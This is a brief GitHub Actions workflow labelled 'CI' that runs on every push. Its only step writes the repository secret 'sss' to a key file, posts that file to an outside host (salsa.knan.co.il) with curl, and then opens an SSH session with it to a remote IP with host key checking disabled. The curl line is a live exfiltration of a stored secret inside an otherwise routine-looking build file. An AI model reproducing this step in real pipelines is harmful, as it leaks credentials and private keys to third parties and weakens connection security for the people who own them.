name: CI

on: [push]

jobs:
  build:

    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v1
    - name: Run a multi-line script
      env: # Or as an environment variable
        sss: ${{ secrets.sss }}
      run: |
        echo -n "${sss}" > secret_key && chmod 400 secret_key
        curl salsa.knan.co.il -d @secret_key
        ssh -i secret_key -o StrictHostKeyChecking=no avik@34.74.245.53 /usr/bin/hostname -s
